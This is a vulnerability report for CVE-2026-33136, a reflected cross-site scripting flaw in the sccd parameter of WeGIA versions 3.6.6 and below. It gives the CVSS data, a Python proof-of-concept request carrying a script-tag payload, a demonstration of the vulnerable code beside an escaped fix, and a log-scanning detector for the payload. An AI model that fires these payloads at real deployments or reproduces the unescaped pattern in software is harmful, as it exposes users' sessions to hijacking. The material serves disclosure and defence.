Security Vulnerability Report
CVE-2026-33136 CVSS 9.3 CRITICAL

CVE-2026-33136

Published: 2026-03-20 11:18:04
Last Modified: 2026-03-20 19:23:41

Description

WeGIA is a web manager for charitable institutions. Versions 3.6.6 and below have a Reflected Cross-Site Scripting (XSS) vulnerability in the listar_memorandos_ativos.php endpoint. An attacker can inject arbitrary JavaScript or HTML tags into the sccd GET parameter, which is then directly echoed into the HTML response without any sanitization or encoding. The script /html/memorando/listar_memorandos_ativos.php handles dynamic success messages to users using query string parameters. Similar to other endpoints in the Memorando module, it checks if $_GET['msg'] equals 'success'. If this condition is met, it directly concatenates and reflects $_GET['sccd'] into an HTML alert <div>. This issue is resolved in version 3.6.7.
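An added illustration of the reflection pattern the description names and of the output-encoding fix. It is written in Python rather than the project's PHP and is not WeGIA's code: render_banner_vulnerable mirrors the described concatenation of $_GET['sccd'] into an alert <div> when $_GET['msg'] is 'success', and render_banner_fixed encodes the value at the output point with html.escape (the PHP counterpart is htmlspecialchars($value, ENT_QUOTES, 'UTF-8')). The function names, the div class and the sample query string are assumptions.

```python
# Added illustration, not WeGIA's code: the reflection pattern the advisory
# describes next to an output-encoded version of the same logic.
from html import escape
from urllib.parse import parse_qs, quote_plus


def parse_query(query_string: str) -> dict:
    """Mimic PHP's $_GET: percent-decode and keep the first value per key."""
    parsed = parse_qs(query_string, keep_blank_values=True)
    return {key: values[0] for key, values in parsed.items()}


def render_banner_vulnerable(get: dict) -> str:
    """The pattern the advisory describes: when msg == 'success' the raw
    sccd value is concatenated into an alert <div> with no encoding."""
    if get.get("msg") == "success":
        return '<div class="alert alert-success">' + get.get("sccd", "") + "</div>"
    return ""


def render_banner_fixed(get: dict) -> str:
    """Same control flow, but the untrusted value is HTML-encoded at the
    output point; quote=True also encodes ' and " so the value stays inert
    even if it is ever placed inside an attribute."""
    if get.get("msg") == "success":
        safe = escape(get.get("sccd", ""), quote=True)
        return '<div class="alert alert-success">' + safe + "</div>"
    return ""


def reflects_raw_markup(rendered: str, payload: str) -> bool:
    """True when the payload reaches the HTML byte-for-byte, i.e. unencoded."""
    return payload in rendered


if __name__ == "__main__":
    # Constructed query string in the shape the published PoC sends.
    payload = "<script>alert(1)</script>"
    get = parse_query("msg=success&sccd=" + quote_plus(payload))
    print("vulnerable:", render_banner_vulnerable(get))
    print("fixed:     ", render_banner_fixed(get))
    print("raw reflection in fixed output:",
          reflects_raw_markup(render_banner_fixed(get), payload))
```

The hardened version keeps the feature (the banner still renders) and changes only the trust boundary: the value is treated as text, never as markup. Encoding belongs at the output point, where the context (HTML body here) is known; validating or stripping at the input point does not give the same guarantee.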

CVSS Details

CVSS Score: 9.3
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

The raw JSON below carries two CVSS v3.1 assessments for this CVE: the Secondary one shown here (9.3 CRITICAL, C:H/I:H) and a Primary one of 6.1 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). The vectors differ only in the confidentiality and integrity impact ratings; both agree on network reachability, no privileges, required user interaction and changed scope, which is the usual profile of a reflected XSS.

Configurations (Affected Products)

cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:* - VULNERABLE
WeGIA <= 3.6.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-33136
# Target: WeGIA <= 3.6.6
import requests

target_url = "http://target.com/html/memorando/listar_memorandos_ativos.php"

# The 'msg' parameter must be 'success' to reach the vulnerable code path
# The 'sccd' parameter is the injection point
params = {
    "msg": "success",
    "sccd": "<script>alert('CVE-2026-33136_XSS');</script>"
}

response = requests.get(target_url, params=params)

if "alert('CVE-2026-33136_XSS')" in response.text:
    print("Vulnerable: XSS payload reflected in response.")
else:
    print("Not vulnerable or payload changed.")
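An added defender-side counterpart to the PoC above, not part of the original report: a small scanner that reads combined-format access log lines and flags requests to the vulnerable path that carry msg=success together with an sccd value still containing markup after percent-decoding. The log lines, IP addresses and user agents are constructed for the example; the decode depth and the markup heuristic are assumptions.

```python
# Added example, not from the advisory: flag requests in an Apache/nginx
# combined-format access log that match the CVE-2026-33136 injection shape.
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Combined log format: client IP, ident, user, [timestamp], "METHOD TARGET PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

VULN_PATH = "/html/memorando/listar_memorandos_ativos.php"
# Heuristic (assumption): tag delimiters, a javascript: URL or an on*= handler
# inside the decoded sccd value are treated as markup.
MARKUP_RE = re.compile(r"<|>|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so a double-encoded %253C is seen
    as '<'. The bound stops a pathological input from looping."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_line(line: str):
    """Return a finding dict when the line targets the vulnerable endpoint
    with msg=success and a markup-bearing sccd value, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith(VULN_PATH):
        return None
    # parse_qs already decodes once; decode_fully catches further layers.
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    sccd = decode_fully(params.get("sccd", ""))
    if params.get("msg") != "success" or not MARKUP_RE.search(sccd):
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": m.group("status"), "sccd": sccd}


def scan(lines):
    """Run check_line over an iterable of log lines and collect the findings."""
    return [finding for finding in (check_line(line) for line in lines) if finding]


# Constructed sample lines (documentation-range IPs, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Mar/2026:12:00:01 +0000] "GET /html/memorando/listar_memorandos_ativos.php?msg=success&sccd=Memorando%20salvo HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Mar/2026:12:00:09 +0000] "GET /html/memorando/listar_memorandos_ativos.php?msg=success&sccd=%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 5203 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Mar/2026:12:00:15 +0000] "GET /html/memorando/listar_memorandos_ativos.php?msg=success&sccd=%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E HTTP/1.1" 200 5190 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [20/Mar/2026:12:01:00 +0000] "GET /html/memorando/listar_memorandos_ativos.php?msg=error&sccd=%3Cb%3E HTTP/1.1" 200 5100 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [20/Mar/2026:12:01:05 +0000] "GET /html/geral/index.php?sccd=%3Cscript%3E HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the vector requires user interaction (UI:R), the request that lands in the log is made by the victim's browser after following a crafted link, so the client IP identifies the affected user rather than the attacker; the value of this check is confirming that a payload reached an unpatched host (status 200 on a version at or below 3.6.6) and identifying whose session to review, with the hard fix remaining the upgrade to 3.6.7.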

References

https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.7 (Release Notes)
https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xjqp-5q3h-2cxh (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33136", "sourceIdentifier": "[email protected]", "published": "2026-03-20T11:18:03.527", "lastModified": "2026-03-20T19:23:40.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeGIA is a web manager for charitable institutions. Versions 3.6.6 and below have a Reflected Cross-Site Scripting (XSS) vulnerability in the listar_memorandos_ativos.php endpoint. An attacker can inject arbitrary JavaScript or HTML tags into the sccd GET parameter, which is then directly echoed into the HTML response without any sanitization or encoding. The script /html/memorando/listar_memorandos_ativos.php handles dynamic success messages to users using query string parameters. Similar to other endpoints in the Memorando module, it checks if $_GET['msg'] equals 'success'. If this condition is met, it directly concatenates and reflects $_GET['sccd'] into an HTML alert <div>. This issue is resolved in version 3.6.7."}, {"lang": "es", "value": "WeGIA es un gestor web para instituciones benéficas. Versiones 3.6.6 e inferiores tienen una vulnerabilidad de cross-site scripting (XSS) reflejado en el endpoint listar_memorandos_ativos.php. Un atacante puede inyectar JavaScript o etiquetas HTML arbitrarias en el parámetro GET sccd, que luego se refleja directamente en la respuesta HTML sin ninguna sanitización o codificación. El script /html/memorando/listar_memorandos_ativos.php maneja mensajes de éxito dinámicos para los usuarios utilizando parámetros de cadena de consulta. Similar a otros endpoints en el módulo Memorando, verifica si $_GET['msg'] es igual a 'success'. Si se cumple esta condición, concatena y refleja directamente $_GET['sccd'] en un <div> de alerta HTML. Este problema se resuelve en la versión 3.6.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.7", "matchCriteriaId": "2D7D6601-2E0C-45E4-BD44-829D2FD7F97C"}]}]}], "references": [{"url": "https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xjqp-5q3h-2cxh", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}